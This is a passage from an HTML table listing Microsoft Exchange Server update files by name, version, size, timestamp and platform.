applicable</td></tr><tr><td>Microsoft.exchange.ediscovery.exporttool.strings.dll.deploy</td><td>15.2.464.11</td><td>52,088</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.ediscovery.mailboxsearch.dll</td><td>15.2.464.11</td><td>292,216</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.birthdaycalendar.dll</td><td>15.2.464.10</td><td>73,288</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.booking.defaultservicesettings.dll</td><td>15.2.464.10</td><td>46,152</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.booking.dll</td><td>15.2.464.10</td><td>218,728</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.booking.management.dll</td><td>15.2.464.10</td><td>78,208</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.bookings.dll</td><td>15.2.464.10</td><td>35,704</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.calendaring.dll</td><td>15.2.464.10</td><td>936,320</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.common.dll</td><td>15.2.464.10</td><td>336,456</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.connectors.dll</td><td>15.2.464.10</td><td>52,608</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.contentsubmissions.dll</td><td>15.2.464.10</td><td>32,128</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.context.dll</td><td>15.2.464.10</td><td>61,008</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.datamodel.dll</td><td>15.2.464.10</td><td>854,088</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.fileproviders.dll</td><td>15.2.464.10</td><td>291,920</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.foldersharing.dll</td><td>15.2.464.10</td><td>39,496</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.holidaycalendars.dll</td><td>15.2.464.10</td><td>76,360</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.insights.dll</td><td>15.2.464.10</td><td>166,784</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.meetinglocation.dll</td><td>15.2.464.10</td><td>1,486,720</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.meetingparticipants.dll</td><td>15.2.464.10</td><td>122,232</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.meetingtimecandidates.dll</td><td>15.2.464.10</td><td>12,327,296</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.onlinemeetings.dll</td><td>15.2.464.10</td><td>264,264</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.people.dll</td><td>15.2.464.10</td><td>37,760</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.peopleinsights.dll</td><td>15.2.464.10</td><td>186,952</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.reminders.dll</td><td>15.2.464.10</td><td>64,384</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.schedules.dll</td><td>15.2.464.10</td><td>84,048</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.shellservice.dll</td><td>15.2.464.10</td><td>64,072</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.tasks.dll</td><td>15.2.464.10</td><td>100,216</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.xrm.dll</td><td>15.2.464.10</td><td>144,968</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.entityextraction.calendar.dll</td><td>15.2.464.10</td><td>270,416</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.eserepl.common.dll</td><td>15.2.464.10</td><td>15,232</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.eserepl.configuration.dll</td><td>15.2.464.10</td><td>15,744</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.eserepl.dll</td><td>15.2.464.10</td><td>130,424</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.ews.configuration.dll</td><td>15.2.464.10</td><td>254,544</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.exchangecertificate.eventlog.dll</td><td>15.2.464.10</td><td>13,184</td><td>01-Jan-2020</td><td>10:49</td><td>x64</td></tr><tr><td>Microsoft.exchange.exchangecertificateservicelet.dll</td><td>15.2.464.11</td><td>37,448</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.extensibility.internal.dll</td><td>15.2.464.10</td><td>640,384</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.extensibility.partner.dll</td><td>15.2.464.10</td><td>37,480</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.federateddirectory.dll</td><td>15.2.464.11</td><td>146,504</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.ffosynclogmsg.dll</td><td>15.2.464.10</td><td>13,176</td><td>01-Jan-2020</td><td>10:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.frontendhttpproxy.dll</td><td>15.2.464.11</td><td>594,512</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.frontendhttpproxy.eventlogs.dll</td><td>15.2.464.10</td><td>14,720</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.frontendtransport.monitoring.dll</td><td>15.2.464.11</td><td>30,080</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.griffin.variantconfiguration.dll</td><td>15.2.464.10</td><td>99,712</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.hathirdpartyreplication.dll</td><td>15.2.464.10</td><td>42,360</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.helpprovider.dll</td><td>15.2.464.10</td><td>40,312</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.addressfinder.dll</td><td>15.2.464.10</td><td>54,344</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.common.dll</td><td>15.2.464.10</td><td>164,224</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.diagnostics.dll</td><td>15.2.464.10</td><td>58,960</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.flighting.dll</td><td>15.2.464.10</td><td>204,368</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.passivemonitor.dll</td><td>15.2.464.10</td><td>18,000</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.proxyassistant.dll</td><td>15.2.464.10</td><td>30,592</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.routerefresher.dll</td><td>15.2.464.10</td><td>38,784</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.routeselector.dll</td><td>15.2.464.10</td><td>48,512</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.routing.dll</td><td>15.2.464.10</td><td>180,608</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpredirectmodules.dll</td><td>15.2.464.11</td><td>36,936</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.httputilities.dll</td><td>15.2.464.10</td><td>25,984</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.hygiene.data.dll</td><td>15.2.464.10</td><td>1,868,152</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.hygiene.diagnosisutil.dll</td><td>15.2.464.10</td><td>54,864</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.hygiene.eopinstantprovisioning.dll</td><td>15.2.464.11</td><td>35,704</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.idserialization.dll</td><td>15.2.464.10</td><td>35,944</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.imap4.eventlog.dll</td><td>15.2.464.10</td><td>18,512</td><td>01-Jan-2020</td><td>10:49</td><td>x64</td></tr><tr><td>Microsoft.exchange.imap4.eventlog.dll.fe</td><td>15.2.464.10</td><td>18,512</td><td>01-Jan-2020</td><td>10:49</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.imap4.exe</td><td>15.2.464.10</td><td>263,032</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.imap4.exe.fe</td><td>15.2.464.10</td><td>263,032</td><td>01-Jan-2020</td><td>10:50</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.imap4service.exe</td><td>15.2.464.10</td><td>24,952</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.imap4service.exe.fe</td><td>15.2.464.10</td><td>24,952</td><td>01-Jan-2020</td><td>10:49</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.imapconfiguration.dl1</td><td>15.2.464.10</td><td>53,112</td><td>01-Jan-2020</td><td>10:47</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.inference.common.dll</td><td>15.2.464.10</td><td>217,160</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.inference.hashtagsrelevance.dll</td><td>15.2.464.10</td><td>32,120</td><td>01-Jan-2020</td><td>10:49</td><td>x64</td></tr><tr><td>Microsoft.exchange.inference.peoplerelevance.dll</td><td>15.2.464.10</td><td>281,984</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.inference.ranking.dll</td><td>15.2.464.10</td><td>19,048</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.inference.safetylibrary.dll</td><td>15.2.464.10</td><td>83,840</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.inference.service.eventlog.dll</td><td>15.2.464.10</td><td>15,224</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.infoworker.assistantsclientresources.dll</td><td>15.2.464.10</td><td>94,072</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.infoworker.common.dll</td><td>15.2.464.10</td><td>1,839,992</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.infoworker.eventlog.dll</td><td>15.2.464.10</td><td>71,544</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.infoworker.meetingvalidator.dll</td><td>15.2.464.10</td><td>175,696</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.instantmessaging.dll</td><td>15.2.464.10</td><td>46,152</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.irm.formprotector.dll</td><td>15.2.464.10</td><td>159,608</td><td>01-Jan-2020</td><td>10:49</td><td>x64</td></tr><tr><td>Microsoft.exchange.irm.msoprotector.dll</td><td>15.2.464.10</td><td>51,072</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.irm.ofcprotector.dll</td><td>15.2.464.10</td><td>46,160</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.isam.databasemanager.dll</td><td>15.2.464.10</td><td>32,128</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.isam.esebcli.dll</td><td>15.2.464.10</td><td>100,456</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.jobqueue.eventlog.dll</td><td>15.2.464.10</td><td>13,384</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.jobqueueservicelet.dll</td><td>15.2.464.11</td><td>271,440</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.killswitch.dll</td><td>15.2.464.10</td><td>22,600</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.killswitchconfiguration.dll</td><td>15.2.464.10</td><td>33,664</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.auditing.dll</td><td>15.2.464.10</td><td>18,296</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.certificatelog.dll</td><td>15.2.464.10</td><td>15,432</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.cmdletinfralog.dll</td><td>15.2.464.10</td><td>27,512</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.easlog.dll</td><td>15.2.464.10</td><td>30,592</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.ecplog.dll</td><td>15.2.464.10</td><td>22,600</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.eventlog.dll</td><td>15.2.464.10</td><td>66,640</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.ewslog.dll</td><td>15.2.464.10</td><td>29,560</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.griffinperfcounter.dll</td><td>15.2.464.10</td><td>20,048</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.groupescalationlog.dll</td><td>15.2.464.10</td><td>20,560</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.httpproxylog.dll</td><td>15.2.464.10</td><td>19,536</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.hxservicelog.dll</td><td>15.2.464.10</td><td>34,384</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.iislog.dll</td><td>15.2.464.10</td><td>104,016</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.lameventlog.dll</td><td>15.2.464.10</td><td>31,824</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.migrationlog.dll</td><td>15.2.464.10</td><td>15,952</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.oabdownloadlog.dll</td><td>15.2.464.10</td><td>21,072</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.oauthcafelog.dll</td><td>15.2.464.10</td><td>16,256</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.outlookservicelog.dll</td><td>15.2.464.10</td><td>49,232</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.owaclientlog.dll</td><td>15.2.464.10</td><td>44,616</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.owalog.dll</td><td>15.2.464.10</td><td>38,272</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.perflog.dll</td><td>15.2.464.10</td><td>10,375,032</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.pfassistantlog.dll</td><td>15.2.464.10</td><td>29,256</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.rca.dll</td><td>15.2.464.10</td><td>21,368</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.restlog.dll</td><td>15.2.464.10</td><td>24,440</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.store.dll</td><td>15.2.464.10</td><td>15,432</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.transportsynchealthlog.dll</td><td>15.2.464.10</td><td>22,088</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.core.dll</td><td>15.2.464.10</td><td>89,464</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.auditing.dll</td><td>15.2.464.10</td><td>20,856</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.certificatelog.dll</td><td>15.2.464.10</td><td>26,488</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.cmdletinfralog.dll</td><td>15.2.464.10</td><td>21,376</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.common.dll</td><td>15.2.464.10</td><td>28,240</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.easlog.dll</td><td>15.2.464.10</td><td>28,536</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.errordetection.dll</td><td>15.2.464.10</td><td>36,216</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.ewslog.dll</td><td>15.2.464.10</td><td>16,768</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.griffinperfcounter.dll</td><td>15.2.464.10</td><td>19,832</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.groupescalationlog.dll</td><td>15.2.464.10</td><td>15,224</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.httpproxylog.dll</td><td>15.2.464.10</td><td>17,280</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.hxservicelog.dll</td><td>15.2.464.10</td><td>19,832</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.iislog.dll</td><td>15.2.464.10</td><td>57,208</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.migrationlog.dll</td><td>15.2.464.10</td><td>17,784</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.oabdownloadlog.dll</td><td>15.2.464.10</td><td>18,808</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.oauthcafelog.dll</td><td>15.2.464.10</td><td>16,464</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.outlookservicelog.dll</td><td>15.2.464.10</td><td>17,784</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.owaclientlog.dll</td><td>15.2.464.10</td><td>15,232</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.owalog.dll</td><td>15.2.464.10</td><td>15,224</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.perflog.dll</td><td>15.2.464.10</td><td>52,816</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.pfassistantlog.dll</td><td>15.2.464.10</td><td>18,296</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.rca.dll</td><td>15.2.464.10</td><td>34,384</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.restlog.dll</td><td>15.2.464.10</td><td>17,280</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.store.dll</td><td>15.2.464.10</td><td>18,808</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.transportsynchealthlog.dll</td><td>15.2.464.10</td><td>43,392</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.loguploader.dll</td><td>15.2.464.10</td><td>165,248</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.loguploaderproxy.dll</td><td>15.2.464.10</td><td>54,864</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxassistants.assistants.dll</td><td>15.2.464.11</td><td>9,055,816</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxassistants.attachmentthumbnail.dll</td><td>15.2.464.10</td><td>33,152</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxassistants.common.dll</td><td>15.2.464.10</td><td>124,288</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxassistants.crimsonevents.dll</td><td>15.2.464.10</td><td>82,808</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxassistants.eventlog.dll</td><td>15.2.464.10</td><td>14,208</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxassistants.rightsmanagement.dll</td><td>15.2.464.10</td><td>30,080</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxloadbalance.dll</td><td>15.2.464.11</td><td>661,600</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxloadbalance.serverstrings.dll</td><td>15.2.464.10</td><td>63,352</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.calendarsyncprovider.dll</td><td>15.2.464.10</td><td>175,488</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.common.dll</td><td>15.2.464.10</td><td>2,791,800</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.complianceprovider.dll</td><td>15.2.464.11</td><td>53,120</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.contactsyncprovider.dll</td><td>15.2.464.10</td><td>151,936</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.dll</td><td>15.2.464.11</td><td>966,520</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.easprovider.dll</td><td>15.2.464.10</td><td>185,448</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.eventlog.dll</td><td>15.2.464.10</td><td>31,848</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.googledocprovider.dll</td><td>15.2.464.10</td><td>40,008</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.imapprovider.dll</td><td>15.2.464.10</td><td>106,056</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.mapiprovider.dll</td><td>15.2.464.10</td><td>95,096</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.popprovider.dll</td><td>15.2.464.10</td><td>43,624</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.proxyclient.dll</td><td>15.2.464.10</td><td>19,024</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.proxyservice.dll</td><td>15.2.464.11</td><td>172,928</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.pstprovider.dll</td><td>15.2.464.11</td><td>102,776</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.remoteprovider.dll</td><td>15.2.464.10</td><td>98,888</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.storageprovider.dll</td><td>15.2.464.10</td><td>188,800</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.syncprovider.dll</td><td>15.2.464.10</td><td>43,384</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.xml.dll</td><td>15.2.464.10</td><td>447,360</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.xrmprovider.dll</td><td>15.2.464.10</td><td>90,192</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.monitoring.dll</td><td>15.2.464.11</td><td>107,896</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.storedriveragents.dll</td><td>15.2.464.10</td><td>374,648</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.storedrivercommon.dll</td><td>15.2.464.10</td><td>193,920</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.storedriverdelivery.dll</td><td>15.2.464.10</td><td>552,312</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.storedriverdelivery.eventlog.dll</td><td>15.2.464.10</td><td>16,248</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxtransport.submission.eventlog.dll</td><td>15.2.464.10</td><td>15,744</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxtransport.submission.storedriversubmission.dll</td><td>15.2.464.10</td><td>321,400</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.submission.storedriversubmission.eventlog.dll</td><td>15.2.464.10</td><td>18,000</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxtransport.syncdelivery.dll</td><td>15.2.464.10</td><td>45,432</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransportwatchdogservicelet.dll</td><td>15.2.464.10</td><td>18,512</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransportwatchdogservicelet.eventlog.dll</td><td>15.2.464.10</td><td>12,664</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.managedlexruntime.mppgruntime.dll</td><td>15.2.464.10</td><td>21,096</td><td>01-Jan-2020</td><td>10:48</